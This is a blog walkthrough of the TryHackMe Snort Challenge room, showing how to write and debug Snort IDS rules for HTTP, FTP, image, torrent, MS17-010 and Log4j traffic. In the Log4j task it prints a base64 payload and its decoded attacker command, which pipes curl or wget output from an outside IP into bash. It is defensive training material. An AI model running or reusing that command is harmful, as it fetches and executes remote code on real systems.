TryHackMe: Snort Challenge – The Basics Walkthrough (SOC Level 1)

Welcome to this walkthrough of the Snort Challenge: The Basics Room on TryHackMe. This room follows upon the theory learned in the Snort Room, which I have covered in this article: TryHackMe: Snort Walkthrough (SOC Level 1). In this room we get to practice our newly aquired Snort skills to cement our knowledge further.

https://tryhackme.com/r/room/snortchallenges1

This room is part of the SOC Level 1 Path.

I am making these walkthroughs to keep myself motivated to learn cyber security, and ensure that I remember the knowledge gained by these challenges on HTB and THM.
Join me on learning cyber security. I will try and explain concepts as I go, to differentiate myself from other walkthroughs.

Now, let’s move on!

Task 1: Introduction

This room continues our journey of learning Snort.
Nothing else gets covered in this task besides mentioning that the exercise files are in the /home/ubuntu/Desktop/Exercise-Files/ folder.

Questions

Read the task above.

Answer: No answer needed

Task 2: Writing IDS Rules (HTTP)

Let’s create IDS Rules for HTTP traffic!A basic rule should look something like this:

alert icmp any any <> any any (sid:1000001;rev1)

Remember, rules should be placed in /home/ubuntu/Desktop/Exercise-Files/TASK-2 (HTTP)/local.rules and can be edited like this (when you are in the correct task folder):

sudo gedit local.rules

The command to run is as follows:

snort -c local.rules -A full -l . -r <pcap name>.pcap

Questions

Navigate to the task folder. Use the given pcap file.
Write a single rule to detect “all TCP port 80 traffic” packets in the given pcap file. What is the number of detected packets?

Alright, let’s go! Edit the rule file by running:

sudo gedit local.rules

We need to filter TCP traffic on port 80. So I suggest the rule should look like this:

alert tcp any any -> any 80 (msg:"TCP port 80 outbound traffic detected";sid:1000000000001; rev :1)
alert tcp any 80 -> any any (msg:"TCP port 80 inbound traffic detected";sid:1000000000002; rev :1)

This filters TCP traffic with a source or destination port equal to 80, each way. The sid is just a rule ID we give the rule, and the revision helps show how often we revised the rule.

After making sure you saved your rule, run the following command:

snort -c local.rules -A full -l . -r mx-3.pcap

The number of alerts is 164.

Answer: 164

Investigate the log file. What is the destination address of packet 63?

Let’s continue where we left off. It is time to look at the generated log file that was generated after running the previous command. It is therefore important to have used the exact same command, and got the right answer, otherwise the rest of this task 2 will be difficult to complete.

While we could read the log file manually, I recommend to use Snort in Packet Logger Mode, which basically just reads a earlier created log file. We do this with the following command:

snort -dvr snort.log.1738265409 -n 63

Note, I used the -n flag which means that 63 packets get read. This way, we just have to look at the final packet in the list.

In the top we can see the target destination address. Remember to remove the port number.

Answer:216.239.59.99

snort -dvr snort.log.1738265409 -n 64

You can find the answer in the top.

Answer:0x2E6B5384

snort -dvr snort.log.1738265409 -n 62

Answer: 0x36C21E28

Investigate the log file. What is the TTL of packet 65?

snort -dvr snort.log.1738265409 -n 65

Answer: No answer needed

Investigate the log file. What is the source IP of packet 65?

You can find this answer in the screenshot above. Simply look at the source IP on the second line.

Answer: 145.254.160.237

Investigate the log file. What is the source port of packet 65?

Once more we are lucky. The source port is 3372, running on the previous IP address.

Answer: No answer needed

Task 3: Writing IDS Rules (FTP)

Now it’s try to log FTP traffic.

Questions

Use the given pcap file. Write a single rule to detect “all TCP port 21”  traffic in the given pcap. What is the number of detected packets?

The process should be very similar, but I will go through it one more time.

Edit the rule by running:

sudo gedit local.rules

alert tcp any 21 -> any any (msg:"FTP traffic from source"; sid:100001; rev:1;)
alert tcp any any -> any 21 (msg:"FTP traffic to destination"; sid:100002; rev:1;

Make sure the rules are setup to be only one way each. If you use the default ‘ <>’ way to much alerts are found. After making sure you saved your rule, run the following command:

snort -c local.rules -A full -l . -r ftp-png-gif.pcap

Answer: 307

Investigate the log file. What is the FTP service name?

We can read the log file like this:

snort -dvr snort.log.<your log number>

Look at the output. There is a packet which refers to the FTP service name:

There on the right side we have the service name.

Answer: Microsoft FTP Service

Clear the previous log and alarm files. Deactivate/comment on the old rules. Write a rule to detect failed FTP login attempts in the given pcap. What is the number of detected packets?

Make sure you deleted old log and alarm files, and remove the old rules.

Hmm.. how to proceed here? You might have noticed this package while answering the previous question:

Here we can see that a error message is visible in the package. Maybe we can query on packets which contain “cannot login”? Or maybe filter on packets that contain a 530 error code (Authentication failed error)?

I suggest we use the content payload option.

Our rule would look like this:

alert tcp any 21 -> any any (content:"530";msg:"failed FTP login";sid:100001; rev:1;)

This time we will only catch connections coming from port number 21, as we are trying to find packets from the FTP service telling hosts that login has failed. Now run snort:

snort -c local.rules -A full -l . -r ftp-png-gif.pcap

Answer: 41

Clear the previous log and alarm files. Deactivate/comment on the old rule. Write a rule to detect successful FTP logins in the given pcap. What is the number of detected packets?

Succesful logins look like this:

So, we basicly need make a small change on the previous rule. Now we just search for “230”.

alert tcp any 21 -> any any (content:"230";msg:"succesful FTP login";sid:100001; rev:1;)

The output should say 1.

If you look at the alert.log file you will find the relevant packet:

Answer: 1

Clear the previous log and alarm files. Deactivate/comment on the old rule. Write a rule to detect FTP login attempts with a valid username but no password entered yet. What is the number of detected packets?

Very similar to before. When a user only inputs a valid username, the FTP server returns a code 331. We can use this again to filter on the content.

alert tcp any 21 -> any any (content:"331";msg:"FTP login without pass";sid:100001; rev:1;)

Answer: 42

Clear the previous log and alarm files. Deactivate/comment on the old rule. Write a rule to detect FTP login attempts with the “Administrator” username but no password entered yet. What is the number of detected packets?

This time we need to do two content filters. One for the 331 code, and one for Administrator.

alert tcp any 21 -> any any (content:"331";content:"Administrator";msg:"FTP login admin without pass";sid:100001; rev:1;)

We found 7 admin log in attempts!

Note: If you want to see the payload information and add more verbosity, you can read the log file with the -dev flag. This way you can see that the messages actually include the text we searched upon:

snort -r snort.log.1738332141 -dev

Answer: 7

Task 4: Writing IDS Rules (PNG)

Let’s create IDS Rules for PNG files in the traffic!

Questions

Navigate to the task folder. Use the given pcap file. Write a rule to detect the PNG file in the given pcap. Investigate the logs and identify the software name embedded in the packet.

Now it’s try to log FTP traffic.

The general process should again be very similar, but I will go through it one last time.

Edit the rule by running:

sudo gedit local.rules

This rule is a bit more difficult. How to detect PNGs? Well the only way we can spot PNG file is by looking at the file’s file signature. PNG files start with a 8-byte header: 89 50 4E 47 0D 0A 1A 0A.

We can filter on this signature by adding it to the content payload option, as we did earlier.

alert tcp any any <> any any (msg:"PNG file detected"; content:"|89 50 4E 47 0D 0A 1A 0A|"; sid:1000001; rev:1;)

When you are happy with the rule, you can run Snort:

snort -c local.rules -A full -l . -r ftp-png-gif.pcap

We can find more info on the alert by reading the log file:

snort -r snort.log.1738438147 -dev

You can read the ASCII representation of the packet’s data on the right. Here you can find the answer: Adobe ImageReady.

Answer: Adobe ImageReady

Clear the previous log and alarm files. Deactivate/comment on the old rule. Write a rule to detect the GIF file in the given pcap. Investigate the logs and identify the image format embedded in the packet.

You should get it by now. Edit the rule file, and run snort. Your rule should detected GIF files, which have the following file signatures.

• GIF87a → 47 49 46 38 37 61 (ASCII: GIF87a)
• GIF89a → 47 49 46 38 39 61 (ASCII: GIF89a)

These are two common GIF formats. But they have 47 49 47 38 in common, so let’s add that to the filter:

alert tcp any any <> any any (msg:"GIF file detected"; content:"|47 49 46 38|"; sid:1000001; rev:1;)

Read the log:

snort -r snort.log.1738439524 -dev

The image format is right there, in each packet.

Answer: GIF89a

Task 5: Writing IDS Rules (Torrent Metafile)

Let’s create IDS Rules for torrent metafiles in the traffic!

Questions

Use the given pcap file. Write a rule to detect the torrent metafile in the given pcap. What is the number of detected packets?

Edit the rule by running:

sudo gedit local.rules

Let’s try and simply try and filter on torrent inside the content.

alert tcp any any <> any any (msg:"Torrent file detected"; content:"torrent"; sid:1000001; rev:1;)

Now run Snort:

snort -c local.rules -A full -l . -r torrent.pcap

Surprisingly this actually worked.

Answer: No answer needed

Investigate the log/alarm files. What is the name of the torrent application?

Read the log file:

snort -r snort.log.1738444835 -dev

The answer to the next few questions are right into the screenshot. The name of the torrent file is bittorrent.

Answer: bittorrent

Investigate the log/alarm files. What is the MIME (Multipurpose Internet Mail Extensions) type of the torrent metafile?

See above. The MIME type is application/x-bittorrent. (A media type (also known as a Multipurpose Internet Mail Extensions or MIME type) indicates the nature and format of a document, file, or assortment of bytes. A MIME type most commonly consists of just two parts: a type and a subtype, separated by a slash (/) — with no whitespace between).

Answer: application/x-bittorrent

Investigate the log/alarm files. What is the hostname of the torrent metafile?

The hostname is also in the screenshot. See it nearly in the bottom.

Answer: tracker2.torrentbox.com

Task 6: Troubleshooting Rule Syntax Errors

Let’s troubleshoot rule syntax errors!

Questions

In this section, you need to fix the syntax errors in the given rule files.
You can test each ruleset with the following command structure;

sudo snort -c local-X.rules -r mx-1.pcap -A console

Fix the syntax error in local-1.rules file and make it work smoothly. What is the number of the detected packets?

The rule is as follows:

alert tcp any 3372 -> any any(msg: "Troubleshooting 1"; sid:1000001; rev:1;)

To see the error we can run the command mentioned before:

sudo snort -c local-1.rules -r mx-1.pcap -A console

You will see the following error:

ERROR: local-1.rules(8) ***Rule--PortVar Parse error: (pos=1,error=not a number)
>>any(msg:
>>^

This takes a bit of practice and some thoughts, but if you read the error you can see that the error is located at any(msg:. The thing to remember here that it is essentials that there is a space between the destination port and the rule options. Add a space and the rule will run:

alert tcp any 3372 -> any any (msg: "Troubleshooting 1"; sid:1000001; rev:1;)

The number of detected packages is shown after you run snort succesfully:

Answer: 16

Fix the syntax error in local-2.rules file and make it work smoothly. What is the number of the detected packets?

Time to check rule 2.

The rule is as follows:

alert icmp any -> any any (msg: "Troubleshooting 2"; sid:1000001; rev:1;)

Let’s check the error:

sudo snort -c local-2.rules -r mx-1.pcap -A console

You will see the following error:

ERROR: local-2.rules(8) Port value missing in rule!

This is much more self explaining. They destination port is missing. Make it look like this instead:

alert icmp any any -> any any (msg: "Troubleshooting 2"; sid:1000001; rev:1;)

Run snort again:

sudo snort -c local-2.rules -r mx-1.pcap -A console

You will find that the number of alerts is 68.

Answer: 68

Fix the syntax error in local-3.rules file and make it work smoothly. What is the number of the detected packets?

I suppose you understand the process now.

The rule looks like this:

icmp any any -> any any (msg: "ICMP Packet Found"; sid:1000001; rev:1;)
alert tcp any any -> any 80,443 (msg: "HTTPX Packet Found"; sid:1000001; rev:1;)

Meanwhile, the error is:

ERROR: local-3.rules(9) GID 1 SID 1000001 in rule duplicates previous rule, with different protocol.

Another well described error. The sid value has to be unique so we will have to change the second line to a sid other than 1000001. Let’s make it like so:

icmp any any -> any any (msg: "ICMP Packet Found"; sid:1000001; rev:1;)
alert tcp any any -> any 80,443 (msg: "HTTPX Packet Found"; sid:1000002; rev:1;)

This works, and we see 87 alerts.

Answer: 87

Fix the syntax error in local-4.rules file and make it work smoothly. What is the number of the detected packets?

Next one:

alert icmp any any -> any any (msg: "ICMP Packet Found"; sid:1000001; rev:1;)
alert tcp any 80,443 -> any any (msg: "HTTPX Packet Found": sid:1000001; rev:1;)

And the error:

ERROR: local-4.rules(9) Unmatch quote in rule option 'msg'.

Something is wrong with the msg property. A closer look at the second rule shows us that they have used “:” instead of “;” after the msg. This makes the rule fail. In addition, we again have two duplicate SID values.  It should look like this:

alert icmp any any -> any any (msg: "ICMP Packet Found"; sid:1000001; rev:1;)
alert tcp any 80,443 -> any any (msg: "HTTPX Packet Found"; sid:1000002; rev:1;)

Thge number of alerts is 90.

Answer: 90

Fix the syntax error in local-5.rules file and make it work smoothly. What is the number of the detected packets?

Three more to go:

alert icmp any any <> any any (msg: "ICMP Packet Found"; sid:1000001; rev:1;)
alert icmp any any <- any any (msg: "Inbound ICMP Packet Found"; sid;1000002; rev:1;)
alert tcp any any -> any 80,443 (msg: "HTTPX Packet Found": sid:1000003; rev:1;)

Error:

ERROR: local-5.rules(9) Illegal direction specifier: <-

The direction operator can only be either -> or <>.

There are other problems though. Only more, on the third line, there is a “:” instead of a “;” between the msg and sid. In addition, we have got a “;” instead of a “:” between the sid property and value on line 2!

It should look like this:

alert icmp any any <> any any (msg: "ICMP Packet Found"; sid:1000001; rev:1;)
alert icmp any any -> any any (msg: "Inbound ICMP Packet Found"; sid:1000002; rev:1;)
alert tcp any any -> any 80,443 (msg: "HTTPX Packet Found"; sid:1000003; rev:1;)

Done! 155 alerts returned.

Answer: 155

Fix the logical error in local-6.rules file and make it work smoothly to create alerts. What is the number of the detected packets?

One more to go! This time the question mentions a logical error.

The rule look like this:

alert tcp any any <> any 80 (msg: "GET Request Found"; content:"|67 65 74|"; sid: 100001; rev:1;)

It actually runs, but does not create any alerts, so let’s fix that.

The numbers 67 65 74 are actually HEX values. It you translate it to human readable letter it says get. The problem here is that the content option in Snort is case-sensitive, and “|67 65 74|” corresponds to “get”, which is lowercase. HTTP GET requests are typically uppercase GET. We could change it to the HEX equivalent of GET which is 47 45 54. We could also add nocase; to the rule, which make the rule case insensitive. I will show both:

alert tcp any any <> any 80 (msg: "GET Request Found"; content:"|47 45 54|"; sid: 100001; rev:1;)

alert tcp any any <> any 80 (msg: "GET Request Found"; content:"|67 65 74|"; nocase; sid: 100001; rev:1;)

Either way, the answer is 2.

Answer: No answer needed

Fix the logical error in local-7.rules file and make it work smoothly to create alerts. What is the name of the required option:

The final one error fixing question, this time covering another logical error!

alert tcp any any <> any 80 (content:"|2E 68 74 6D 6C|"; sid: 100001; rev:1;)

The rule actually works, returning 9 errors. But it should get improved I suppose.

2E 68 74 6D 6C translates to: .html.

Looking at the question again I guess THM means that the msg option is missing, making it hard to understand the rule.

Answer: msg

Task 7: Using External Rules (MS17-010)

Two more tasks to go. You are doing great! Let’s now external rules to fight against the latest threats! This should be a bit easier since we can just run the external rules given.

Questions

Navigate to the task folder. Use the given pcap file. Use the given rule file (local.rules) to investigate the ms1710 exploitation. What is the number of detected packets?

In case you are unsure, MS17-010 is a famous vulnerability in Microsoft Server Message Block 1.0. It has been patched a long time ago (2017) but there are likely still vulnerable systems out there in the wild.

Alright, let’s run Snort with the given rule file on the given pcap file:

snort -c local.rules -A full -l . -r ms-17-010.pcap

25154 alerts! Holy moly.

Answer: 25154

Clear the previous log and alarm files. Use local-1.rules empty file to write a new rule to detect payloads containing the “\IPC$” keyword. What is the number of detected packets?

Hmm. Seems we need to write rules ourselves anyway.

I made this rule, containing the content filter for \IPC$:

alert tcp any any -> any any (msg: "Exploit Detected!"; content: "IPC$"; sid:1000001; rev: 1;)

Run the command:

snort -c local-1.rules -A full -l . -r ms-17-010.pcap

We received 12 alerts!

Answer: 12

Investigate the log/alarm files. What is the requested path?

To read the log file enter the following command, but remember to edit for your own log file name:

snort -r snort.log.1738520885 -dev

Look at any of the 12 log entries. You will see the path in the hexadecimal part of the data.

Answer: \\192.168.116.138\IPC$

What is the CVSS v2 score of the MS17-010 vulnerability?

I simply googled CVSS score MS17-010 and got to the following page:

https://nvd.nist.gov/vuln/detail/cve-2017-0144

The info is right there, but remember to select CVSS Version 2.0:

Answer: 9.3

Task 8: Using External Rules (Log4j)

Let’s use external rules to fight against the latest threats!

Questions

Navigate to the task folder. Use the given pcap file. Use the given rule file (local.rules) to investigate the log4j exploitation. What is the number of detected packets?

Run the given rule file on the given pcap file:

snort -c local.rules -A full -l . -r log4j.pcap

We have received 26 alarms:

Answer: 26

Investigate the log/alarm files. How many rules were triggered?

Just below the previous alarm info you will find another section called Limits. Under this section there are the number of events. This is equal to the number of triggered rules.

Answer: 4

Investigate the log/alarm files. What are the first six digits of the triggered rule sids?

Scroll even more down to find the info on the filtered events:

We can see that all 3 rules start with 210037.

Answer: 210037

Clear the previous log and alarm files. Use local-1.rules empty file to write a new rule to detect packet payloads between 770 and 855 bytes. What is the number of detected packets?

Being unsure how to proceed, I check Snorts documentation page. I came across this rule option:

https://docs.snort.org/rules/options/payload/dsize

There are even examples, so our rule value would be dsize:770<>855;.

All together this will look like:

alert tcp any any -> any any (msg:"Size between 770 and 855 bytes detected"; dsize:770<>855; sid:1000001; rev:1;)

Now run Snort:

snort -c local.-1rules -A full -l . -r log4j.pcap

The number of detected packets is 41.

Answer: 41

Investigate the log/alarm files. What is the name of the used encoding algorithm?

Read the log files again:

snort -r snort.log.1738523237 -dev

Take a look at the packets, the answer is out there! There is at least one packet with the answer:

Answer: Base64

Investigate the log/alarm files. What is the IP ID of the corresponding packet?

Scroll up a bit to find the info on the corresponding packet:

The IP ID is close to the top: 62808.

Answer: 62808

Investigate the log/alarm files. Decode the encoded command. What is the attacker’s command?

The base64 encoded command is found right after Base64/, still in the same packet:

For your convenience it is this string:

KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8xNjIuMC4yMjguMjUzOjgwfHx3Z2V0IC1xIC1PLSA0NS4xNTUuMjA1LjIzMzo1ODc0LzE2Mi4wLjIyOC4yNTM6ODApfGJhc2g=}

I simply copied this into https://www.base64decode.org/, and found the answer.

Answer: (curl -s 45.155.205.233:5874/162.0.228.253:80||wget -q -O- 45.155.205.233:5874/162.0.228.253:80)|bash

What is the CVSS v2 score of the Log4j vulnerability?

As in the previous question, I found the answer on the NIST homepage:

https://nvd.nist.gov/vuln/detail/cve-2021-44228

The answer is 9.3 once more:

Answer: 9.3

Task 9: Conclusion

Congratulations! Are you brave enough to stop a live attack in the Snort2 Challenge 2room?

PFEW. What a room! I might be ready after a good night sleep! 😀

Questions

Read the task above.

Answer: No answer needed

Congratulations on completing Snort Challenge – The Basics!!!

Congratulations on finishing this walkthrough of the TryHackMe Snort Challenge – The Basics room. This was such a long, but amazing room and I really felt like I have gotten to know Snort so much more. I am actually looking forward to the next room!

I hope you enjoyed this walkthrough. This one in particular took me a long one to write!
Come back soon for more walkthroughs of rooms on TryHackMe and HackTheBox, and other Cybersecurity discussions.

Like my articles?

You are welcome to comment on this post, or share my post with friends.
I would be even more grateful if you support me by buying me a cup of coffee:

I learned a lot through HackTheBox’s Academy. If you want to sign up, you can get extra cubes, and support me in the process, if you use the following link:

https://referral.hackthebox.com/mzwwXlg